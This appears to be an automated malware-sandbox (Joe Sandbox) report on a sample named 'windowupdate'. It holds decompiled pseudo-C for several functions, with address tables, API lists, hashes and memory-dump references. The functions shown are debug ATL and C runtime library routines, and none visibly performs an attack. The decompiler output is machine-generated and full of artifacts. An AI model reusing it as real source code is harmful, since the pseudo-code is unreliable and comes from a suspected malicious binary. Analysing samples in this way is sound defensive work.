                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlstr.h$__atl_condVal$pData->pStringMgr == this
                      • API String ID: 930174750-2123114947
                      • Opcode ID: dcc1cb9dfbf68bd512997067b76b22ec065af39f42c7f3b5e8fcb0c30c8f9edd
                      • Instruction ID: bb80b802bf5d152491c249f0f7531d6d58f5a94d8dbd395741f69f3147876334
                      • Opcode Fuzzy Hash: dcc1cb9dfbf68bd512997067b76b22ec065af39f42c7f3b5e8fcb0c30c8f9edd
                      • Instruction Fuzzy Hash: 6551C2BAE04608BFDB24DBA5DC86FAEB3B4EB48314F149518F905B7281D270DA44CB74
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D42DE0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 153COMMON
                      Download Yara Rule
                      C-Code - Quality: 62%
                      			E00D42DE0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t51;
				void* _t54;
				void* _t55;
				intOrPtr _t62;
				void* _t67;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;

				_t87 = __esi;
				_t86 = __edi;
				_t67 = __ebx;
				_v32 = 0xcccccccc;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				do {
					if(_a4 == 0) {
						_v24 = 0;
					} else {
						_v24 = 1;
					}
					_v8 = _v24;
					do {
						_t92 = _v8;
						if(_v8 == 0) {
							_t51 = L00D84930(_t92, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x71, 0, "%ls", L"__atl_condVal");
							_t89 = _t89 + 0x18;
							if(_t51 == 1) {
								asm("int3");
							}
						}
					} while (0 != 0);
					_t95 = _v8;
					if(_v8 == 0) {
						E00D32500(_t67, _t86, _t87, _t95, 0x80070057);
					}
				} while (0 != 0);
				do {
					if(_a8 < 0) {
						_v28 = 0;
					} else {
						_v28 = 1;
					}
					_v12 = _v28;
					do {
						_t98 = _v12;
						if(_v12 == 0) {
							_t54 = L00D84930(_t98, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x72, 0, "%ls", L"__atl_condVal");
							_t89 = _t89 + 0x18;
							if(_t54 == 1) {
								asm("int3");
							}
						}
					} while (0 != 0);
					_t101 = _v12;
					if(_v12 == 0) {
						E00D32500(_t67, _t86, _t87, _t101, 0x80070057);
					}
				} while (0 != 0);
				do {
					if(_a12 == 0) {
						_v32 = 0;
					} else {
						_v32 = 1;
					}
					_v16 = _v32;
					do {
						_t104 = _v16;
						if(_v16 == 0) {
							_t55 = L00D84930(_t104, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlconv.h", 0x73, 0, "%ls", L"__atl_condVal");
							_t89 = _t89 + 0x18;
							if(_t55 == 1) {
								asm("int3");
							}
						}
					} while (0 != 0);
					_t107 = _v16;
					if(_v16 == 0) {
						E00D32500(_t67, _t86, _t87, _t107, 0x80070057);
					}
				} while (0 != 0);
				if( *_a4 == _a12) {
					__eflags = _a8 - _a16;
					if(__eflags <= 0) {
						_t58 = _a4;
						 *_a4 = _a12;
					} else {
						_t58 = E00D5B960(_a8, 1);
						_t89 = _t89 + 8;
						 *_a4 = _t58;
					}
				} else {
					if(_a8 <= _a16) {
						_t58 = E00D84B40( *_a4);
						_t89 = _t89 + 4;
						 *_a4 = _a12;
					} else {
						_t62 = E00D82210( *_a4, _a8, 1);
						_t89 = _t89 + 0xc;
						_v20 = _t62;
						_t111 = _v20;
						if(_v20 == 0) {
							E00D32500(_t67, _t86, _t87, _t111, 0x8007000e);
						}
						_t58 = _a4;
						 *_a4 = _v20;
					}
				}
				_t112 =  *_a4;
				if( *_a4 == 0) {
					_t58 = E00D32500(_t67, _t86, _t87, _t112, 0x8007000e);
				}
				return E00DC1520(_t58, _t88 - _t89 + 0x1c);
			}



















                      0x00d42de0
                      0x00d42de0
                      0x00d42de0
                      0x00d42deb
                      0x00d42dee
                      0x00d42df1
                      0x00d42df4
                      0x00d42df7
                      0x00d42dfa
                      0x00d42dfd
                      0x00d42e00
                      0x00d42e04
                      0x00d42e0f
                      0x00d42e06
                      0x00d42e06
                      0x00d42e06
                      0x00d42e19
                      0x00d42e1c
                      0x00d42e1c
                      0x00d42e20
                      0x00d42e37
                      0x00d42e3c
                      0x00d42e42
                      0x00d42e44
                      0x00d42e44
                      0x00d42e42
                      0x00d42e45
                      0x00d42e49
                      0x00d42e4d
                      0x00d42e54
                      0x00d42e54
                      0x00d42e59
                      0x00d42e5d
                      0x00d42e61
                      0x00d42e6c
                      0x00d42e63
                      0x00d42e63
                      0x00d42e63
                      0x00d42e76
                      0x00d42e79
                      0x00d42e79
                      0x00d42e7d
                      0x00d42e94
                      0x00d42e99
                      0x00d42e9f
                      0x00d42ea1
                      0x00d42ea1
                      0x00d42e9f
                      0x00d42ea2
                      0x00d42ea6
                      0x00d42eaa
                      0x00d42eb1
                      0x00d42eb1
                      0x00d42eb6
                      0x00d42eba
                      0x00d42ebe
                      0x00d42ec9
                      0x00d42ec0
                      0x00d42ec0
                      0x00d42ec0
                      0x00d42ed3
                      0x00d42ed6
                      0x00d42ed6
                      0x00d42eda
                      0x00d42ef1
                      0x00d42ef6
                      0x00d42efc
                      0x00d42efe
                      0x00d42efe
                      0x00d42efc
                      0x00d42eff
                      0x00d42f03
                      0x00d42f07
                      0x00d42f0e
                      0x00d42f0e
                      0x00d42f13
                      0x00d42f1f
                      0x00d42f75
                      0x00d42f78
                      0x00d42f8f
                      0x00d42f95
                      0x00d42f7a
                      0x00d42f80
                      0x00d42f85
                      0x00d42f8b
                      0x00d42f8b
                      0x00d42f21
                      0x00d42f27
                      0x00d42f60
                      0x00d42f65
                      0x00d42f6e
                      0x00d42f29
                      0x00d42f35
                      0x00d42f3a
                      0x00d42f3d
                      0x00d42f40
                      0x00d42f44
                      0x00d42f4b
                      0x00d42f4b
                      0x00d42f50
                      0x00d42f56
                      0x00d42f56
                      0x00d42f70
                      0x00d42f9a
                      0x00d42f9d
                      0x00d42fa4
                      0x00d42fa4
                      0x00d42fb6

                      APIs
                      • __wdupenv_s.LIBCMTD ref: 00D42F35
                        • Part of subcall function 00D32500: _Smanip.LIBCPMTD ref: 00D3253B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Smanip__wdupenv_s
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlconv.h$__atl_condVal
                      • API String ID: 167151435-2826139414
                      • Opcode ID: 54b2655e1b96ff36b9ac912b8152bd28b72629b612b34742835ca223468c2d9e
                      • Instruction ID: c4ef84e91e4d4c21e98ed8f1aeb3881626346d2d3fb3039764abc439aa20a786
                      • Opcode Fuzzy Hash: 54b2655e1b96ff36b9ac912b8152bd28b72629b612b34742835ca223468c2d9e
                      • Instruction Fuzzy Hash: B7515C70E00209EFDF10EF91C846BBE7770AF54314FA48569F904AB281E3B49A94CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D34490 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 87%
                      			E00D34490(char** __ecx, void* __esi, void* _a4, char* _a8, char* _a12, int _a16, int _a20, struct _SECURITY_ATTRIBUTES* _a24, intOrPtr* _a28) {
				char** _v8;
				char** _v12;
				int _v16;
				char** _v20;
				char** _v24;
				void* _v28;
				char** _v32;
				char** _v36;
				char** _v40;
				long _t53;
				void* _t57;
				void* _t67;
				char* _t83;
				void* _t90;
				void* _t91;

				_t89 = __esi;
				_v40 = 0xcccccccc;
				_v36 = 0xcccccccc;
				_v32 = 0xcccccccc;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t93 = _a4;
				if(_a4 == 0) {
					_t67 = L00D84930(_t93, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x16e2, 0, "%ls", L"hKeyParent != 0");
					_t91 = _t91 + 0x18;
					if(_t67 == 1) {
						asm("int3");
					}
				}
				_v28 = 0;
				if(_v8[2] == 0) {
					_t89 = _t91;
					_t83 = _a8;
					_t53 = RegCreateKeyExA(_a4, _t83, 0, _a12, _a16, _a20, _a24,  &_v28,  &_v16);
					__eflags = _t91 - _t91;
					_v40 = E00DC1520(_t53, _t91 - _t91);
				} else {
					_t83 = _a8;
					_v40 = E00D33200(_v8[2], _t89, _a4, _t83, 0, _a12, _a16, _a20, _a24,  &_v28,  &_v16);
				}
				_v36 = _v40;
				if(_v36 == 0) {
					if(_a28 != 0) {
						 *_a28 = _v16;
					}
					_v36 = E00D34420(_v8, _t89);
					_t83 = _v28;
					 *_v8 = _t83;
					_v8[1] = _a20 & 0x00000300;
				}
				_push(_t83);
				_push(_v36);
				E00DC14C0(_t90, 0xd345bc);
				_pop(_t57);
				return E00DC1520(_t57, _t90 - _t91 + 0x24);
			}


















                      0x00d34490
                      0x00d3449c
                      0x00d3449f
                      0x00d344a2
                      0x00d344a5
                      0x00d344a8
                      0x00d344ab
                      0x00d344ae
                      0x00d344b1
                      0x00d344b4
                      0x00d344b7
                      0x00d344ba
                      0x00d344be
                      0x00d344d8
                      0x00d344dd
                      0x00d344e3
                      0x00d344e5
                      0x00d344e5
                      0x00d344e3
                      0x00d344e6
                      0x00d344f4
                      0x00d34528
                      0x00d34544
                      0x00d3454c
                      0x00d34552
                      0x00d34559
                      0x00d344f6
                      0x00d34510
                      0x00d34523
                      0x00d34523
                      0x00d3455f
                      0x00d34566
                      0x00d3456c
                      0x00d34574
                      0x00d34574
                      0x00d3457e
                      0x00d34584
                      0x00d34587
                      0x00d34594
                      0x00d34594
                      0x00d3459a
                      0x00d3459d
                      0x00d345a4
                      0x00d345a9
                      0x00d345b9

                      APIs
                      • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,?,?,00000000,?,00000000,?), ref: 00D3454C
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D345A4
                      Strings
                      • hKeyParent != 0, xrefs: 00D344C0
                      • %ls, xrefs: 00D344C5
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D344D1
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckCreateStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hKeyParent != 0
                      • API String ID: 2215485779-2309544881
                      • Opcode ID: f1e5d31f2ab060463fd807e88a0ea7fe5867a6d71671ac0bf9817362acad56bf
                      • Instruction ID: 99816b691d397325efc933cc53c170f97ec49abf6de045930e1a799a15c67104
                      • Opcode Fuzzy Hash: f1e5d31f2ab060463fd807e88a0ea7fe5867a6d71671ac0bf9817362acad56bf
                      • Instruction Fuzzy Hash: 7D41D7B5E00209AFCB04DF98C891BEEB7F9EB4C300F148169E509A7240E775AE41CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00DC1C50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 94%
                      			E00DC1C50(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v528;
				char _v1048;
				signed int _t13;
				void* _t17;
				void* _t27;
				void* _t30;
				void* _t42;
				signed int _t43;
				void* _t44;
				void* _t45;

				_t42 = __esi;
				_t41 = __edi;
				_t40 = __edx;
				_t34 = __ebx;
				_t13 =  *0xdf600c; // 0x71e60372
				_v8 = _t13 ^ _t43;
				if( *0xf237c8 != 0) {
					L13:
					_t15 = 0;
					goto L14;
				} else {
					 *0xf237c8 = 1;
					if(E00DC1DA0(__edx) != 0) {
						L14:
						return E00D47280(_t15, _t34, _v8 ^ _t43, _t40, _t41, _t42);
					} else {
						_t17 = E00DC24D0(L"VCRUNTIME140D.dll");
						_t45 = _t44 + 4;
						if(_t17 == 0) {
							L8:
							if(E00DC24E0(L"MSPDB140", 0, 0xa00) != 0) {
								goto L14;
							} else {
								if(GetLastError() != 0x57 || E00DC24B0(0,  &_v1048, 0x104) == 0 || E00DC2000(_t34, _t41,  &_v1048,  &_v528, 0x104) == 0) {
									goto L13;
								} else {
									return E00D47280(E00DC24E0( &_v528, 0, 8), _t34, _v8 ^ _t43, _t40, _t41, _t42);
								}
							}
						} else {
							_t27 = E00DC24B0(_t17,  &_v1048, 0x104);
							_t45 = _t45 + 0xc;
							if(_t27 == 0) {
								goto L8;
							} else {
								_t30 = E00DC2000(__ebx, __edi,  &_v1048,  &_v528, 0x104);
								_t45 = _t45 + 0xc;
								if(_t30 == 0) {
									goto L8;
								} else {
									_t15 = E00DC24E0( &_v528, 0, 0x900);
									_t45 = _t45 + 0xc;
									if(_t15 != 0) {
										goto L14;
									} else {
										if(GetLastError() != 0x57) {
											goto L8;
										} else {
											_t15 = E00DC24E0( &_v528, 0, 8);
											_t45 = _t45 + 0xc;
											if(_t15 != 0) {
												goto L14;
											} else {
												goto L8;
											}
										}
									}
								}
							}
						}
					}
				}
			}














                      0x00dc1c50
                      0x00dc1c50
                      0x00dc1c50
                      0x00dc1c50
                      0x00dc1c59
                      0x00dc1c60
                      0x00dc1c6a
                      0x00dc1d8a
                      0x00dc1d8a
                      0x00000000
                      0x00dc1c70
                      0x00dc1c70
                      0x00dc1c7e
                      0x00dc1d8c
                      0x00dc1d99
                      0x00dc1c84
                      0x00dc1c89
                      0x00dc1c8e
                      0x00dc1c93
                      0x00dc1d0d
                      0x00dc1d23
                      0x00000000
                      0x00dc1d25
                      0x00dc1d2e
                      0x00000000
                      0x00dc1d69
                      0x00dc1d89
                      0x00dc1d89
                      0x00dc1d2e
                      0x00dc1c95
                      0x00dc1ca2
                      0x00dc1ca7
                      0x00dc1cac
                      0x00000000
                      0x00dc1cae
                      0x00dc1cc1
                      0x00dc1cc6
                      0x00dc1ccb
                      0x00000000
                      0x00dc1ccd
                      0x00dc1cdb
                      0x00dc1ce0
                      0x00dc1ce5
                      0x00000000
                      0x00dc1ceb
                      0x00dc1cf4
                      0x00000000
                      0x00dc1cf6
                      0x00dc1d01
                      0x00dc1d06
                      0x00dc1d0b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00dc1d0b
                      0x00dc1cf4
                      0x00dc1ce5
                      0x00dc1ccb
                      0x00dc1cac
                      0x00dc1c93
                      0x00dc1c7e

                      APIs
                      • GetPdbDllFromInstallPath.LIBCMTD ref: 00DC1C77
                        • Part of subcall function 00DC1DA0: GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00DC1DE9
                        • Part of subcall function 00DC1DA0: GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00DC1E0F
                        • Part of subcall function 00DC1DA0: GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 00DC1E21
                        • Part of subcall function 00DC1DA0: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 00DC1E33
                        • Part of subcall function 00DC1DA0: FreeLibrary.KERNEL32(00000000), ref: 00DC1E67
                        • Part of subcall function 00DC24D0: GetModuleHandleW.KERNEL32(00DC1C8E,?,00DC1C8E,VCRUNTIME140D.dll), ref: 00DC24D7
                      • GetLastError.KERNEL32 ref: 00DC1CEB
                      • GetLastError.KERNEL32 ref: 00DC1D25
                        • Part of subcall function 00DC24B0: GetModuleFileNameW.KERNEL32(00D3241C,?,00DC2111,?,00DC2111,?,00D3241C,00DC1975), ref: 00DC24BF
                        • Part of subcall function 00DC2000: __aligned_msize.LIBCMTD ref: 00DC205F
                        • Part of subcall function 00DC2000: __aligned_msize.LIBCMTD ref: 00DC2079
                        • Part of subcall function 00DC2000: __CrtDbgReportWV.LIBCMTD ref: 00DC20A2
                        • Part of subcall function 00DC24E0: LoadLibraryExW.KERNEL32(?,?,00000800,?,00DC1DC7,api-ms-win-core-registry-l1-1-0.dll,00000000,00000800,?,?,00000000), ref: 00DC24EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: AddressErrorLastProc$LibraryModule__aligned_msize$FileFreeFromHandleInstallLoadNamePathReport
                      • String ID: MSPDB140$VCRUNTIME140D.dll
                      • API String ID: 1159430209-1916464790
                      • Opcode ID: 6d5fa9ce0c261512866bf177a1ade8efdd0e6af56c4dec0dab7067c0a3f08ffb
                      • Instruction ID: 1d9d2ee40e6179aa294262869a6135ec39354744af3d8aa5aa38d6cb936d984b
                      • Opcode Fuzzy Hash: 6d5fa9ce0c261512866bf177a1ade8efdd0e6af56c4dec0dab7067c0a3f08ffb
                      • Instruction Fuzzy Hash: D031A9F5E4031A67EB20A7606C46FA9736C9B11705F184179EE05E7183FA71DA4886B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D334A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90COMMON
                      Download Yara Rule
                      C-Code - Quality: 44%
                      			E00D334A0(void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t30;
				void* _t33;
				intOrPtr _t35;
				void* _t37;
				void* _t40;
				void* _t46;
				intOrPtr* _t55;
				void* _t64;
				void* _t65;

				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				do {
					_t30 = _a4;
					_t67 =  *((intOrPtr*)(_t30 + 0x10));
					if( *((intOrPtr*)(_t30 + 0x10)) == 0) {
						_t46 = L00D84930(_t67, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0xfa, 0, "%ls", L"pCache != 0");
						_t65 = _t65 + 0x18;
						if(_t46 == 1) {
							asm("int3");
						}
					}
					_t55 = 0;
				} while (0 != 0);
				_v12 = 0;
				if( *((intOrPtr*)(_a4 + 8)) != 0) {
					_t55 =  *((intOrPtr*)(_a4 + 8));
					_t33 =  *_t55( *((intOrPtr*)(_a4 + 0xc)), 0xdf02d4,  &_v12);
					__eflags = _t65 - _t65;
					_v20 = E00DC1520(_t33, _t65 - _t65);
					__eflags = _v20;
					if(_v20 >= 0) {
						_t55 = _a4;
						__imp__CoRegisterClassObject( *_t55, _v12, _a8, _a12,  *((intOrPtr*)(_a4 + 0x10)) + 4);
						__eflags = _t65 - _t65;
						_v20 = E00DC1520( *_t55, _t65 - _t65);
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t55 =  *_v12;
						_t40 =  *((intOrPtr*)( *((intOrPtr*)(_t55 + 8))))(_v12);
						__eflags = _t65 - _t65;
						E00DC1520(_t40, _t65 - _t65);
					}
					_t35 = _v20;
				} else {
					_t35 = 0;
				}
				_push(_t55);
				E00DC14C0(_t64, 0xd3359c);
				_t37 = _t35;
				return E00DC1520(_t37, _t64 - _t65 + 0x10);
			}
















                      0x00d334ac
                      0x00d334af
                      0x00d334b2
                      0x00d334b5
                      0x00d334b8
                      0x00d334b8
                      0x00d334bb
                      0x00d334bf
                      0x00d334d9
                      0x00d334de
                      0x00d334e4
                      0x00d334e6
                      0x00d334e6
                      0x00d334e4
                      0x00d334e7
                      0x00d334e7
                      0x00d334eb
                      0x00d334f9
                      0x00d33514
                      0x00d33517
                      0x00d33519
                      0x00d33520
                      0x00d33523
                      0x00d33527
                      0x00d33541
                      0x00d33547
                      0x00d3354d
                      0x00d33554
                      0x00d33554
                      0x00d33557
                      0x00d3355b
                      0x00d33560
                      0x00d3356b
                      0x00d3356d
                      0x00d3356f
                      0x00d3356f
                      0x00d33574
                      0x00d334fb
                      0x00d334fb
                      0x00d334fb
                      0x00d33577
                      0x00d33581
                      0x00d33586
                      0x00d33596

                      APIs
                      • CoRegisterClassObject.OLE32(?,00000000,?,00000000,?), ref: 00D33547
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D33581
                      Strings
                      • pCache != 0, xrefs: 00D334C1
                      • %ls, xrefs: 00D334C6
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D334D2
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckClassObjectRegisterStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$pCache != 0
                      • API String ID: 1978586063-3984120347
                      • Opcode ID: d57634ea2333fbaf42f66c59e341ddaa320afbbcc49111ceb3a383f46c55fdc5
                      • Instruction ID: 16689fb1547c46e9013afa8bb22f4a9884ececf2d2eba9296aac52d6b617e6a6
                      • Opcode Fuzzy Hash: d57634ea2333fbaf42f66c59e341ddaa320afbbcc49111ceb3a383f46c55fdc5
                      • Instruction Fuzzy Hash: D7314175A00219AFDB14EF98D885FAEB7B5EB48354F148658F4099B252E770DE80CBF0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D80A50 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 89timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00D80A50(intOrPtr _a4) {
				signed int _v8;
				char _v12;
				signed char _v16;
				signed char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed char _t34;
				void* _t40;
				signed int _t42;
				signed int _t60;
				void* _t61;

				E00D66E20( &_v12, _a4);
				_t34 = E00D69640( &_v12);
				_t50 = _t34 & 0x000000ff;
				if((_t34 & 0x000000ff) != 0) {
					L12:
					_v24 = 1;
					L13:
					_v28 = _v24;
					_t70 = _v28;
					if(_v28 == 0) {
						_t40 = L00D84930(_t70, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio.h", 0x1b8, 0, L"%ls", L"( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))");
						_t61 = _t61 + 0x18;
						if(_t40 == 1) {
							asm("int3");
						}
					}
					if(_v28 != 0) {
						return 1;
					} else {
						 *((intOrPtr*)(L00D82F70(_t50))) = 0x16;
						E00D82900(L"( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && !_tm_unicode_safe(fn))))", L"__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required", L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_stdio.h", 0x1b8, 0);
						return 0;
					}
				}
				_t50 =  &_v12;
				_t42 = E00D98780(E00D6C080( &_v12));
				_t61 = _t61 + 4;
				_v8 = _t42;
				if(_v8 == 0xffffffff || _v8 == 0xfffffffe) {
					_v16 = 0xdf61f0;
				} else {
					_t60 = _v8 >> 6;
					_t50 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + _t60 * 4));
					_v16 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + _t60 * 4));
				}
				if( *((char*)(_v16 + 0x29)) != 0) {
					L11:
					_v24 = 0;
					goto L13;
				} else {
					if(_v8 == 0xffffffff || _v8 == 0xfffffffe) {
						_v20 = 0xdf61f0;
					} else {
						_v20 = (_v8 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xf21198 + (_v8 >> 6) * 4));
					}
					_t25 = _v20 + 0x2d; // 0x0
					_t50 =  *_t25 & 0x00000001;
					if(( *_t25 & 1) == 0) {
						goto L12;
					} else {
						goto L11;
					}
				}
			}














                      0x00d80a5f
                      0x00d80a67
                      0x00d80a6c
                      0x00d80a71
                      0x00d80b09
                      0x00d80b09
                      0x00d80b10
                      0x00d80b13
                      0x00d80b16
                      0x00d80b1a
                      0x00d80b34
                      0x00d80b39
                      0x00d80b3f
                      0x00d80b41
                      0x00d80b41
                      0x00d80b3f
                      0x00d80b46
                      0x00000000
                      0x00d80b48
                      0x00d80b4d
                      0x00d80b69
                      0x00000000
                      0x00d80b71
                      0x00d80b46
                      0x00d80a77
                      0x00d80a80
                      0x00d80a85
                      0x00d80a88
                      0x00d80a8f
                      0x00d80ab2
                      0x00d80a97
                      0x00d80a9a
                      0x00d80aa6
                      0x00d80aad
                      0x00d80aad
                      0x00d80ac0
                      0x00d80b00
                      0x00d80b00
                      0x00000000
                      0x00d80ac2
                      0x00d80ac6
                      0x00d80ae9
                      0x00d80ace
                      0x00d80ae4
                      0x00d80ae4
                      0x00d80af3
                      0x00d80af6
